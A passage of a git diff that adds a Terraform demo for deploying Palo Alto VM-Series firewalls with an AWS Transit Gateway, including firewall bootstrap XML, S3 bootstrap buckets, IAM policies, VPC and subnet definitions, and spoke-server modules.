+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>untrust-fw2</member>
+                  </destination>
+                  <service>tcp-1002</service>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <destination-translation>
+                    <translated-port>22</translated-port>
+                    <translated-address>10.1.1.4</translated-address>
+                  </destination-translation>
+                </entry>
+                <entry name="NAT_IN_SPOKE2-1">
+                  <to>
+                    <member>untrust-zone</member>
+                  </to>
+                  <from>
+                    <member>untrust-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>untrust-fw2</member>
+                  </destination>
+                  <service>tcp-2001</service>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <destination-translation>
+                    <translated-port>22</translated-port>
+                    <translated-address>10.2.0.4</translated-address>
+                  </destination-translation>
+                </entry>
+                <entry name="NAT_IN_SPOKE2-2">
+                  <to>
+                    <member>untrust-zone</member>
+                  </to>
+                  <from>
+                    <member>untrust-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>untrust-fw2</member>
+                  </destination>
+                  <service>tcp-2002</service>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <destination-translation>
+                    <translated-port>22</translated-port>
+                    <translated-address>10.2.1.4</translated-address>
+                  </destination-translation>
+                </entry>
+              </rules>
+            </nat>
+            <default-security-rules>
+              <rules>
+                <entry name="intrazone-default">
+                  <action>allow</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                </entry>
+                <entry name="interzone-default">
+                  <action>deny</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                </entry>
+              </rules>
+            </default-security-rules>
+          </rulebase>
+          <import>
+            <network>
+              <interface>
+                <member>ethernet1/1</member>
+                <member>ethernet1/2</member>
+              </interface>
+            </network>
+          </import>
+          <address>
+            <entry name="untrust-fw2">
+              <ip-netmask>192.168.11.4</ip-netmask>
+            </entry>
+          </address>
+          <tag>
+            <entry name="untrust-zone">
+              <color>color6</color>
+            </entry>
+            <entry name="trust-zone">
+              <color>color13</color>
+            </entry>
+          </tag>
+        </entry>
+      </vsys>
+    </entry>
+  </devices>
+</config>
diff --git a/aws/transitgateway-demo-v2/bootstrap_files/fw2/init-cfg.txt b/aws/transitgateway-demo-v2/bootstrap_files/fw2/init-cfg.txt
new file mode 100644
index 00000000..2fd77546
--- /dev/null
+++ b/aws/transitgateway-demo-v2/bootstrap_files/fw2/init-cfg.txt
@@ -0,0 +1,18 @@
+type=dhcp-client
+ip-address=
+default-gateway=
+netmask=
+ipv6-address=
+ipv6-default-gateway=
+hostname=vmseries-fw2
+panorama-server=
+panorama-server-2=
+tplname=
+dgname=
+dns-primary=
+dns-secondary=
+op-command-modes=mgmt-interface-swap
+dhcp-send-hostname=yes
+dhcp-send-client-id=yes
+dhcp-accept-server-hostname=no
+dhcp-accept-server-domain=yes
diff --git a/aws/transitgateway-demo-v2/create_s3_bootstrap.tf b/aws/transitgateway-demo-v2/create_s3_bootstrap.tf
new file mode 100644
index 00000000..a4d0a15a
--- /dev/null
+++ b/aws/transitgateway-demo-v2/create_s3_bootstrap.tf
@@ -0,0 +1,161 @@
+#************************************************************************************
+# CREATE 2 S3 BUCKETS FOR FW1 & FW2
+#************************************************************************************
+resource "random_string" "randomstring" {
+  length      = 25
+  min_lower   = 15
+  min_numeric = 10
+  special     = false
+}
+
+resource "aws_s3_bucket" "bootstrap_bucket_fw1" {
+  bucket        = "${join("", list(var.bootstrap_s3bucket1_create, "-", random_string.randomstring.result))}"
+  acl           = "private"
+  force_destroy = true
+}
+
+resource "aws_s3_bucket" "bootstrap_bucket_fw2" {
+  bucket        = "${join("", list(var.bootstrap_s3bucket2_create, "-", random_string.randomstring.result))}"
+  acl           = "private"
+  force_destroy = true
+}
+
+
+#************************************************************************************
+# CREATE FW1 DIRECTORIES & UPLOAD FILES FROM /bootstrap_files/fw1 DIRECTORY
+#************************************************************************************
+resource "aws_s3_bucket_object" "bootstrap_xml" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket_fw1.id}"
+  acl    = "private"
+  key    = "config/bootstrap.xml"
+  source = "bootstrap_files/fw1/bootstrap.xml"
+}
+
+resource "aws_s3_bucket_object" "init-cft_txt" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket_fw1.id}"
+  acl    = "private"
+  key    = "config/init-cfg.txt"
+  source = "bootstrap_files/fw1/init-cfg.txt"
+}
+
+resource "aws_s3_bucket_object" "software" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket_fw1.id}"
+  acl    = "private"
+  key    = "software/"
+  source = "/dev/null"
+}
+
+resource "aws_s3_bucket_object" "license" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket_fw1.id}"
+  acl    = "private"
+  key    = "license/authcodes"
+  source = "bootstrap_files/fw1/authcodes"
+}
+
+resource "aws_s3_bucket_object" "content" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket_fw1.id}"
+  acl    = "private"
+  key    = "content/"
+  source = "/dev/null"
+}
+
+
+#************************************************************************************
+# CREATE FW2 DIRECTORIES & UPLOAD FILES FROM /bootstrap_files/fw2 DIRECTORY
+#************************************************************************************
+resource "aws_s3_bucket_object" "bootstrap_xml2" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket_fw2.id}"
+  acl    = "private"
+  key    = "config/bootstrap.xml"
+  source = "bootstrap_files/fw2/bootstrap.xml"
+}
+
+resource "aws_s3_bucket_object" "init-cft_txt2" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket_fw2.id}"
+  acl    = "private"
+  key    = "config/init-cfg.txt"
+  source = "bootstrap_files/fw2/init-cfg.txt"
+}
+
+resource "aws_s3_bucket_object" "software2" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket_fw2.id}"
+  acl    = "private"
+  key    = "software/"
+  source = "/dev/null"
+}
+
+resource "aws_s3_bucket_object" "license2" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket_fw2.id}"
+  acl    = "private"
+  key    = "license/authcodes"
+  source = "bootstrap_files/fw2/authcodes"
+}
+
+resource "aws_s3_bucket_object" "content2" {
+  bucket = "${aws_s3_bucket.bootstrap_bucket_fw2.id}"
+  acl    = "private"
+  key    = "content/"
+  source = "/dev/null"
+}
+
+
+#************************************************************************************
+# CREATE & ASSIGN IAM ROLE, POLICY, & INSTANCE PROFILE
+#************************************************************************************
+resource "aws_iam_role" "bootstrap_role" {
+  name = "ngfw_bootstrap_role123"
+
+  assume_role_policy = <<EOF
+{
+  "Version": "2012-10-17",
+  "Statement": [
+    {
+      "Effect": "Allow",
+      "Principal": {
+      "Service": "ec2.amazonaws.com"
+    },
+      "Action": "sts:AssumeRole"
+    }
+  ]
+}
+EOF
+}
+
+resource "aws_iam_role_policy" "bootstrap_policy" {
+  name = "ngfw_bootstrap_policy"
+  role = "${aws_iam_role.bootstrap_role.id}"
+
+  policy = <<EOF
+{
+  "Version" : "2012-10-17",
+  "Statement": [
+    {
+      "Effect": "Allow",
+      "Action": "s3:ListBucket",
+      "Resource": "arn:aws:s3:::${aws_s3_bucket.bootstrap_bucket_fw1.id}"
+    },
+    {
+      "Effect": "Allow",
+      "Action": "s3:GetObject",
+      "Resource": "arn:aws:s3:::${aws_s3_bucket.bootstrap_bucket_fw1.id}/*"
+    },
+    {
+      "Effect": "Allow",
+      "Action": "s3:ListBucket",
+      "Resource": "arn:aws:s3:::${aws_s3_bucket.bootstrap_bucket_fw2.id}"
+    },
+    {
+      "Effect": "Allow",
+      "Action": "s3:GetObject",
+      "Resource": "arn:aws:s3:::${aws_s3_bucket.bootstrap_bucket_fw2.id}/*"
+    }
+  ]
+}
+EOF
+}
+
+resource "aws_iam_instance_profile" "bootstrap_profile" {
+  name = "ngfw_bootstrap_profile123"
+  role = "${aws_iam_role.bootstrap_role.name}"
+  path = "/"
+}
diff --git a/aws/transitgateway-demo-v2/create_tgw.tf b/aws/transitgateway-demo-v2/create_tgw.tf
new file mode 100644
index 00000000..50c82cd3
--- /dev/null
+++ b/aws/transitgateway-demo-v2/create_tgw.tf
@@ -0,0 +1,60 @@
+#************************************************************************************
+# CREATE TGW
+#************************************************************************************
+resource "aws_ec2_transit_gateway" "tgw" {
+  description                     = "Transit Gateway"
+  vpn_ecmp_support                = "enable"
+  default_route_table_association = "disable"
+  default_route_table_propagation = "disable"
+  dns_support                     = "enable"
+  auto_accept_shared_attachments  = "disable"
+
+  tags {
+    Name = "tgw"
+  }
+}
+
+#************************************************************************************
+# CREATE TGW ROUTE TABLES
+#************************************************************************************
+resource "aws_ec2_transit_gateway_route_table" "tgw_security" {
+  transit_gateway_id = "${aws_ec2_transit_gateway.tgw.id}"
+
+  tags {
+    Name = "tgw-rtb-security"
+  }
+}
+
+resource "aws_ec2_transit_gateway_route_table" "tgw_spokes" {
+  transit_gateway_id = "${aws_ec2_transit_gateway.tgw.id}"
+
+  tags {
+    Name = "tgw-rtb-spokes"
+  }
+}
+
+#************************************************************************************
+# CREATE ROUTES FOR TGW ROUTE TABLES
+#************************************************************************************
+resource "aws_ec2_transit_gateway_route" "default" {
+  destination_cidr_block         = "0.0.0.0/0"
+  transit_gateway_attachment_id  = "${aws_ec2_transit_gateway_vpc_attachment.tgw_security.id}"
+  transit_gateway_route_table_id = "${aws_ec2_transit_gateway_route_table.tgw_spokes.id}"
+}
+
+resource "aws_ec2_transit_gateway_route_table_association" "vpc_security" {
+  transit_gateway_attachment_id  = "${aws_ec2_transit_gateway_vpc_attachment.tgw_security.id}"
+  transit_gateway_route_table_id = "${aws_ec2_transit_gateway_route_table.tgw_security.id}"
+}
+
+resource "aws_ec2_transit_gateway_vpc_attachment" "tgw_security" {
+  vpc_id                                          = "${aws_vpc.vpc_security.id}"
+  subnet_ids                                      = ["${aws_subnet.vpc_security_tgw_1.id}", "${aws_subnet.vpc_security_tgw_2.id}"]
+  transit_gateway_id                              = "${aws_ec2_transit_gateway.tgw.id}"
+  transit_gateway_default_route_table_association = false
+  transit_gateway_default_route_table_propagation = false
+
+  tags {
+    Name = "fw-vpc-attachment"
+  }
+}
diff --git a/aws/transitgateway-demo-v2/create_vpc_security.tf b/aws/transitgateway-demo-v2/create_vpc_security.tf
new file mode 100644
index 00000000..7ae44cfc
--- /dev/null
+++ b/aws/transitgateway-demo-v2/create_vpc_security.tf
@@ -0,0 +1,490 @@
+data "aws_availability_zones" "available" {}
+
+
+
+#************************************************************************************
+# CREATE SECURITY VPC & SUBNETS
+#************************************************************************************
+resource "aws_vpc" "vpc_security" {
+  cidr_block = "${var.vpc_security_cidr}"
+
+  tags {
+    Name = "fw-vpc"
+  }
+}
+
+resource "aws_subnet" "vpc_security_mgmt_1" {
+  vpc_id            = "${aws_vpc.vpc_security.id}"
+  cidr_block        = "${var.vpc_security_subnet_mgmt_1}"
+  availability_zone = "${data.aws_availability_zones.available.names[0]}"
+
+  tags {
+    Name = "mgmt-fw1"
+  }
+}
+
+resource "aws_subnet" "vpc_security_mgmt_2" {
+  vpc_id            = "${aws_vpc.vpc_security.id}"
+  cidr_block        = "${var.vpc_security_subnet_mgmt_2}"
+  availability_zone = "${data.aws_availability_zones.available.names[1]}"
+
+  tags {
+    Name = "mgmt-fw2"
+  }
+}
+
+resource "aws_subnet" "vpc_security_untrust1" {
+  vpc_id            = "${aws_vpc.vpc_security.id}"
+  cidr_block        = "${var.vpc_security_subnet_public_1}"
+  availability_zone = "${data.aws_availability_zones.available.names[0]}"
+
+  tags {
+    Name = "untrust-fw1"
+  }
+}
+
+resource "aws_subnet" "vpc_security_untrust2" {
+  vpc_id            = "${aws_vpc.vpc_security.id}"
+  cidr_block        = "${var.vpc_security_subnet_public_2}"
+  availability_zone = "${data.aws_availability_zones.available.names[1]}"
+
+  tags {
+    Name = "untrust-fw2"
+  }
+}
+
+resource "aws_subnet" "vpc_security_trust_1" {
+  vpc_id            = "${aws_vpc.vpc_security.id}"
+  cidr_block        = "${var.vpc_security_subnet_private_1}"
+  availability_zone = "${data.aws_availability_zones.available.names[0]}"
+
+  tags {
+    Name = "trust-fw1"
+  }
+}
+
+resource "aws_subnet" "vpc_security_trust_2" {
+  vpc_id            = "${aws_vpc.vpc_security.id}"
+  cidr_block        = "${var.vpc_security_subnet_private_2}"
+  availability_zone = "${data.aws_availability_zones.available.names[1]}"
+
+  tags {
+    Name = "trust-fw2"
+  }
+}
+
+resource "aws_subnet" "vpc_security_tgw_1" {
+  vpc_id            = "${aws_vpc.vpc_security.id}"
+  cidr_block        = "${var.vpc_security_subnet_tgw_1}"
+  availability_zone = "${data.aws_availability_zones.available.names[0]}"
+
+  tags {
+    Name = "tgw-fw1"
+  }
+}
+
+resource "aws_subnet" "vpc_security_tgw_2" {
+  vpc_id            = "${aws_vpc.vpc_security.id}"
+  cidr_block        = "${var.vpc_security_subnet_tgw_2}"
+  availability_zone = "${data.aws_availability_zones.available.names[1]}"
+
+  tags {
+    Name = "tgw-fw2"
+  }
+}
+
+resource "aws_subnet" "vpc_security_lambda_1" {
+  vpc_id            = "${aws_vpc.vpc_security.id}"
+  cidr_block        = "${var.vpc_security_subnet_lambda_1}"
+  availability_zone = "${data.aws_availability_zones.available.names[0]}"
+
+  tags {
+    Name = "lambda-subnet1"
+  }
+}
+
+resource "aws_subnet" "vpc_security_lambda_2" {
+  vpc_id            = "${aws_vpc.vpc_security.id}"
+  cidr_block        = "${var.vpc_security_subnet_lambda_2}"
+  availability_zone = "${data.aws_availability_zones.available.names[1]}"
+
+  tags {
+    Name = "lambda-subnet2"
+  }
+}
+
+#************************************************************************************
+# CREATE IGW FOR SECURITY VPC
+#************************************************************************************
+resource "aws_internet_gateway" "vpc_security_igw" {
+  vpc_id = "${aws_vpc.vpc_security.id}"
+
+  tags {
+    Name = "igw-security-vpc"
+  }
+}
+
+#************************************************************************************
+# CREATE ROUTE TABLES FOR SUBNETS
+#************************************************************************************
+resource "aws_route_table" "vpc_security_mgmt" {
+  vpc_id = "${aws_vpc.vpc_security.id}"
+
+  tags {
+    Name = "fw-mgmt"
+  }
+}
+
+resource "aws_route_table" "vpc_security_untrust" {
+  vpc_id = "${aws_vpc.vpc_security.id}"
+
+  tags {
+    Name = "fw-untrust"
+  }
+}
+
+resource "aws_route_table" "vpc_security_trust" {
+  vpc_id = "${aws_vpc.vpc_security.id}"
+
+  tags {
+    Name = "fw-to-tgw"
+  }
+}
+
+resource "aws_route_table" "vpc_security_tgw" {
+  vpc_id = "${aws_vpc.vpc_security.id}"
+
+  tags {
+    Name = "fw-from-tgw"
+  }
+}
+resource "aws_route_table" "vpc_security_lambda_1" {
+  vpc_id = "${aws_vpc.vpc_security.id}"
+
+  tags {
+    Name = "lambda-r1-1"
+  }
+}
+resource "aws_route_table" "vpc_security_lambda_2" {
+  vpc_id = "${aws_vpc.vpc_security.id}"
+
+  tags {
+    Name = "lambda-rt-2"
+  }
+}
+
+
+
+#************************************************************************************
+# CREATE ROUTES FOR SUBNET ROUTE TABLES
+#************************************************************************************
+resource "aws_route" "vpc_security_mgmt" {
+  route_table_id         = "${aws_route_table.vpc_security_mgmt.id}"
+  destination_cidr_block = "0.0.0.0/0"
+  gateway_id             = "${aws_internet_gateway.vpc_security_igw.id}"
+}
+
+resource "aws_route" "vpc_security_untrust" {
+  route_table_id         = "${aws_route_table.vpc_security_untrust.id}"
+  destination_cidr_block = "0.0.0.0/0"
+  gateway_id             = "${aws_internet_gateway.vpc_security_igw.id}"
+}
+resource "aws_route" "vpc_security_lambda_1" {
+  route_table_id         = "${aws_route_table.vpc_security_lambda_1.id}"
+  destination_cidr_block = "0.0.0.0/0"
+  gateway_id             = "${aws_nat_gateway.natgw1.id}"
+}
+resource "aws_route" "vpc_security_lambda_2" {
+  route_table_id         = "${aws_route_table.vpc_security_lambda_2.id}"
+  destination_cidr_block = "0.0.0.0/0"
+  gateway_id             = "${aws_nat_gateway.natgw2.id}"
+}
+
+resource "aws_route" "vpc_security_trust" {
+  route_table_id         = "${aws_route_table.vpc_security_trust.id}"
+  destination_cidr_block = "${var.all_spoke_cidr}"
+  transit_gateway_id     = "${aws_ec2_transit_gateway.tgw.id}"
+}
+
+resource "aws_route" "vpc_security_tgw_0" {
+  route_table_id         = "${aws_route_table.vpc_security_tgw.id}"
+  destination_cidr_block = "0.0.0.0/0"
+  network_interface_id   = "${module.ngfw1.eni-trust}"
+}
+
+resource "aws_route" "vpc_security_tgw_1" {
+  route_table_id         = "${aws_route_table.vpc_security_tgw.id}"
+  destination_cidr_block = "${var.all_spoke_cidr}"
+  network_interface_id   = "${module.ngfw2.eni-trust}"
+}
+
+#************************************************************************************
+# ASSOCIATE ROUTE TABLES WITH SUBNETS 
+#************************************************************************************
+resource "aws_route_table_association" "vpc_security_mgmt_1" {
+  subnet_id      = "${aws_subnet.vpc_security_mgmt_1.id}"
+  route_table_id = "${aws_route_table.vpc_security_mgmt.id}"
+}
+
+resource "aws_route_table_association" "vpc_security_mgmt_2" {
+  subnet_id      = "${aws_subnet.vpc_security_mgmt_2.id}"
+  route_table_id = "${aws_route_table.vpc_security_mgmt.id}"
+}
+
+resource "aws_route_table_association" "vpc_security_untrust1" {
+  subnet_id      = "${aws_subnet.vpc_security_untrust1.id}"
+  route_table_id = "${aws_route_table.vpc_security_untrust.id}"
+}
+
+resource "aws_route_table_association" "vpc_security_untrust2" {
+  subnet_id      = "${aws_subnet.vpc_security_untrust2.id}"
+  route_table_id = "${aws_route_table.vpc_security_untrust.id}"
+}
+
+resource "aws_route_table_association" "vpc_security_trust_1" {
+  subnet_id      = "${aws_subnet.vpc_security_trust_1.id}"
+  route_table_id = "${aws_route_table.vpc_security_trust.id}"
+}
+
+resource "aws_route_table_association" "vpc_security_trust_2" {
+  subnet_id      = "${aws_subnet.vpc_security_trust_2.id}"
+  route_table_id = "${aws_route_table.vpc_security_trust.id}"
+}
+
+resource "aws_route_table_association" "vpc_security_tgw_1" {
+  subnet_id      = "${aws_subnet.vpc_security_tgw_1.id}"
+  route_table_id = "${aws_route_table.vpc_security_tgw.id}"
+}
+
+resource "aws_route_table_association" "vpc_security_tgw_2" {
+  subnet_id      = "${aws_subnet.vpc_security_tgw_2.id}"
+  route_table_id = "${aws_route_table.vpc_security_tgw.id}"
+}
+
+resource "aws_route_table_association" "vpc_security_lambda_1" {
+  subnet_id      = "${aws_subnet.vpc_security_lambda_1.id}"
+  route_table_id = "${aws_route_table.vpc_security_lambda_1.id}"
+}
+resource "aws_route_table_association" "vpc_security_lambda_2" {
+  subnet_id      = "${aws_subnet.vpc_security_lambda_2.id}"
+  route_table_id = "${aws_route_table.vpc_security_lambda_2.id}"
+}
+
+#************************************************************************************
+# CREATE NSGs & NSG RULES FOR FW MANAGEMENT ENI (22, 443, 3978-Panorama)
+#************************************************************************************
+resource "aws_security_group" "mgmt_nsg" {
+  name        = "mgmt_nsg"
+  description = "Allow HTTPS and SSH inbound traffic"
+  vpc_id      = "${aws_vpc.vpc_security.id}"
+}
+
+resource "aws_security_group_rule" "mgmt_nsg_ingress_22" {
+  type        = "ingress"
+  from_port   = 22
+  to_port     = 22
+  protocol    = "tcp"
+  cidr_blocks = ["${var.management_cidr}"]
+
+  security_group_id = "${aws_security_group.mgmt_nsg.id}"
+}
+
+resource "aws_security_group_rule" "mgmt_nsg_ingress_443" {
+  type        = "ingress"
+  from_port   = 443
+  to_port     = 443
+  protocol    = "tcp"
+  cidr_blocks = ["${var.management_cidr}"]
+
+  security_group_id = "${aws_security_group.mgmt_nsg.id}"
+}
+
+resource "aws_security_group_rule" "mgmt_nsg_ingress_3978" {
+  type        = "ingress"
+  from_port   = 3978
+  to_port     = 3978
+  protocol    = "tcp"
+  cidr_blocks = ["${var.management_cidr}"]
+
+  security_group_id = "${aws_security_group.mgmt_nsg.id}"
+}
+
+resource "aws_security_group_rule" "mgmt_nsg_egress" {
+  type        = "egress"
+  from_port   = 0
+  to_port     = 0
+  protocol    = "-1"
+  cidr_blocks = ["0.0.0.0/0"]
+
+  security_group_id = "${aws_security_group.mgmt_nsg.id}"
+}
+
+
+#************************************************************************************
+# CREATE NSG & NSG RULES FOR FW DATAPLANE ENIs
+#************************************************************************************
+resource "aws_security_group" "data_nsg" {
+  name        = "data_nsg"
+  description = "Allow all inbound traffic"
+  vpc_id      = "${aws_vpc.vpc_security.id}"
+}
+
+resource "aws_security_group_rule" "data_nsg_ingress" {
+  type        = "ingress"
+  from_port   = 0
+  to_port     = 0
+  protocol    = "-1"
+  cidr_blocks = ["0.0.0.0/0"]
+
+  security_group_id = "${aws_security_group.data_nsg.id}"
+}
+
+resource "aws_security_group_rule" "data_nsg_egress" {
+  type        = "egress"
+  from_port   = 0
+  to_port     = 0
+  protocol    = "-1"
+  cidr_blocks = ["0.0.0.0/0"]
+
+  security_group_id = "${aws_security_group.data_nsg.id}"
+}
+
+#************************************************************************************
+# CREATE NAT GATEWAYS
+#************************************************************************************
+resource "aws_eip" "eip-natgw1" {
+  vpc               = true
+  tags {
+    Name = "eip_natgw1"
+  }
+}
+resource "aws_eip" "eip-natgw2" {
+  vpc               = true
+  tags {
+    Name = "eip_natgw2"
+  }
+}
+resource "aws_nat_gateway" "natgw1" {
+
+  allocation_id = "${aws_eip.eip-natgw1.id}"
+  subnet_id     = "${aws_subnet.vpc_security_mgmt_1.id}"
+  tags = {
+    Name = "gw1 NAT"
+  }
+  depends_on = ["aws_internet_gateway.vpc_security_igw"]
+}
+resource "aws_nat_gateway" "natgw2" {
+
+  allocation_id = "${aws_eip.eip-natgw2.id}"
+  subnet_id     = "${aws_subnet.vpc_security_mgmt_2.id}"
+  tags = {
+    Name = "gw2 NAT"
+  }
+  depends_on = ["aws_internet_gateway.vpc_security_igw"]
+}
+  
+  
+
+
+#************************************************************************************
+# CREATE FW1
+#************************************************************************************
+module "ngfw1" {
+  source = "./modules/vm-series/"
+
+  name = "vmseries-fw1"
+
+  aws_key = "${var.aws_key}"
+
+  trust_subnet_id         = "${aws_subnet.vpc_security_trust_1.id}"
+  trust_security_group_id = "${aws_security_group.data_nsg.id}"
+  trustfwip               = "${var.fw_ip_subnet_private_1}"
+
+  untrust_subnet_id         = "${aws_subnet.vpc_security_untrust1.id}"
+  untrust_security_group_id = "${aws_security_group.data_nsg.id}"
+  untrustfwip               = "${var.fw_ip_subnet_public_1 }"
+
+  management_subnet_id         = "${aws_subnet.vpc_security_mgmt_1.id}"
+  management_security_group_id = "${aws_security_group.mgmt_nsg.id}"
+
+  bootstrap_profile = "${aws_iam_instance_profile.bootstrap_profile.id}"
+  bootstrap_bucket  = "${aws_s3_bucket.bootstrap_bucket_fw1.id}"
+
+  tgw_id = "${aws_ec2_transit_gateway.tgw.id}"
+
+  aws_region        = "${var.aws_region}"
+  ngfw_license_type = "${var.ngfw_license_type}"
+  instance_type     = "${var.instance_type}"
+}
+
+
+#************************************************************************************
+# CREATE FW2
+#************************************************************************************
+module "ngfw2" {
+  source = "./modules/vm-series/"
+
+  name = "vmseries-fw2"
+
+  aws_key = "${var.aws_key}"
+
+  trust_subnet_id         = "${aws_subnet.vpc_security_trust_2.id}"
+  trust_security_group_id = "${aws_security_group.data_nsg.id}"
+  trustfwip               = "${var.fw_ip_subnet_private_2}"
+
+  untrust_subnet_id         = "${aws_subnet.vpc_security_untrust2.id}"
+  untrust_security_group_id = "${aws_security_group.data_nsg.id}"
+  untrustfwip               = "${var.fw_ip_subnet_public_2 }"
+
+  management_subnet_id         = "${aws_subnet.vpc_security_mgmt_2.id}"
+  management_security_group_id = "${aws_security_group.mgmt_nsg.id}"
+
+  bootstrap_profile = "${aws_iam_instance_profile.bootstrap_profile.id}"
+  bootstrap_bucket  = "${aws_s3_bucket.bootstrap_bucket_fw2.id}"
+
+  tgw_id = "${aws_ec2_transit_gateway.tgw.id}"
+
+  aws_region        = "${var.aws_region}"
+  ngfw_license_type = "${var.ngfw_license_type}"
+  instance_type     = "${var.instance_type}"
+}
+
+output "FW-1-MGMT" {
+  value = "Access the firewall MGMT via:  https://${module.ngfw1.eip_mgmt}"
+}
+
+output "Server-1-1_ngfw1_access" {
+  value = "Access Server 1-1 via FW-1: ssh -i <Insert Key> ubuntu@${module.ngfw1.eip_untrust} -p 1001"
+}
+
+output "Server-1-2_ngfw1_access" {
+  value = "Access Server 1-2 via FW-1: ssh -i <Insert Key> ubuntu@${module.ngfw1.eip_untrust} -p 1002"
+}
+
+output "Server-2-1_ngfw1_access" {
+  value = "Access Server 2-1 via FW-1: ssh -i <Insert Key> ubuntu@${module.ngfw1.eip_untrust} -p 2001"
+}
+
+output "Server-2-2_ngfw1_access" {
+  value = "Access Server 2-2 via FW-1: ssh -i <Insert Key> ubuntu@${module.ngfw1.eip_untrust} -p 2002"
+}
+
+output "FW-2-MGMT" {
+  value = "Access the firewall MGMT via:  https://${module.ngfw2.eip_mgmt}"
+}
+
+output "Server-1-1_ngfw2_access" {
+  value = "Access Server 1-1 via FW-2: ssh -i <Insert Key> ubuntu@${module.ngfw2.eip_untrust} -p 1001"
+}
+
+output "Server-1-2_ngfw2_access" {
+  value = "Access Server 1-2 via FW-2: ssh -i <Insert Key> ubuntu@${module.ngfw2.eip_untrust} -p 1002"
+}
+
+output "Server-2-1_ngfw2_access" {
+  value = "Access Server 2-1 via FW-2: ssh -i <Insert Key> ubuntu@${module.ngfw2.eip_untrust} -p 2001"
+}
+
+output "Server-2-2_ngfw2_access" {
+  value = "Access Server 2-2 via FW-2: ssh -i <Insert Key> ubuntu@${module.ngfw2.eip_untrust} -p 2002"
+}
diff --git a/aws/transitgateway-demo-v2/create_vpc_spokes.tf b/aws/transitgateway-demo-v2/create_vpc_spokes.tf
new file mode 100644
index 00000000..2d58f387
--- /dev/null
+++ b/aws/transitgateway-demo-v2/create_vpc_spokes.tf
@@ -0,0 +1,38 @@
+#************************************************************************************
+# CREATE SPOKE1 VPC & SPOKE1 VMs
+#************************************************************************************
+module "spoke1" {
+  source = "./modules/vm-spoke/"
+
+  pemkey                  = "${var.aws_key}"
+  serverip                = "${var.spoke1_server}"
+  server2ip               = "${var.spoke1_server2}"
+  servername              = "spoke1-vm1"
+  server2name             = "spoke1-vm2"
+  vpc_spoke_cidr          = "${var.spoke1_cidr}"
+  vpc_spoke_subnet_cidr   = "${var.spoke1_subnet}"
+  vpc_spoke_subnet2_cidr  = "${var.spoke1_subnet2}"
+  aws_tgw_id              = "${aws_ec2_transit_gateway.tgw.id}"
+  aws_tgw_spoke_rtb_id    = "${aws_ec2_transit_gateway_route_table.tgw_spokes.id}"
+  aws_tgw_security_rtb_id = "${aws_ec2_transit_gateway_route_table.tgw_security.id}"
+}
+
+
+#************************************************************************************
+# CREATE SPOKE2 VPC & SPOKE2 VMs
+#************************************************************************************
+module "spoke2" {
+  source = "./modules/vm-spoke/"
+
+  pemkey                  = "${var.aws_key}"
+  serverip                = "${var.spoke2_server}"
+  server2ip               = "${var.spoke2_server2}"
+  servername              = "spoke2-vm1"
+  server2name             = "spoke2-vm2"
+  vpc_spoke_cidr          = "${var.spoke2_cidr}"
+  vpc_spoke_subnet_cidr   = "${var.spoke2_subnet}"
+  vpc_spoke_subnet2_cidr  = "${var.spoke2_subnet2}"
+  aws_tgw_id              = "${aws_ec2_transit_gateway.tgw.id}"
+  aws_tgw_spoke_rtb_id    = "${aws_ec2_transit_gateway_route_table.tgw_spokes.id}"
+  aws_tgw_security_rtb_id = "${aws_ec2_transit_gateway_route_table.tgw_security.id}"
+}
diff --git a/aws/transitgateway-demo-v2/iam/lambda-assume-policy.json b/aws/transitgateway-demo-v2/iam/lambda-assume-policy.json
new file mode 100644
index 00000000..ff6a5ac3
--- /dev/null
+++ b/aws/transitgateway-demo-v2/iam/lambda-assume-policy.json
@@ -0,0 +1,13 @@
+{
+  "Version": "2012-10-17",
+  "Statement": [
+    {
+      "Action": "sts:AssumeRole",
+      "Principal": {
+        "Service": "lambda.amazonaws.com"
+      },
+      "Effect": "Allow",
+      "Sid": ""
+    }
+  ]
+}
\ No newline at end of file
diff --git a/aws/transitgateway-demo-v2/iam/lambda-policy.json b/aws/transitgateway-demo-v2/iam/lambda-policy.json
new file mode 100644
index 00000000..0a09605b
--- /dev/null
+++ b/aws/transitgateway-demo-v2/iam/lambda-policy.json
@@ -0,0 +1,70 @@
+{
+  "Version": "2012-10-17",
+  "Statement": [
+    {
+      "Sid": "Stmt1562699731140",
+      "Action": [
+        "ec2:AttachNetworkInterface",
+        "ec2:CreateNetworkInterface",
+        "ec2:DescribeAddresses",
+        "ec2:DescribeAvailabilityZones",
+        "ec2:DescribeNetworkInterfaces",
+        "ec2:DescribeRouteTables",
+        "ec2:DescribeSubnets",
+        "ec2:DescribeVpcs",
+        "ec2:DetachNetworkInterface",
+        "ec2:DisassociateAddress"
+      ],
+      "Effect": "Allow",
+      "Resource": "*"
+    },
+    {
+      "Sid": "Stmt1563196113460",
+      "Action": [
+        "lambda:GetLayerVersion",
+        "lambda:ListLayerVersions",
+        "lambda:ListLayers"
+      ],
+      "Effect": "Allow",
+      "Resource": "*"
+    },
+    {
+      "Sid": "Stmt1563207109230",
+      "Action": [
+        "logs:CreateLogStream",
+        "logs:DescribeLogGroups",
+        "logs:DescribeLogStreams",
+        "logs:PutLogEvents"
+      ],
+      "Effect": "Allow",
+      "Resource": "*"
+    },
+    {
+      "Sid": "Stmt1563225210788",
+      "Action": [
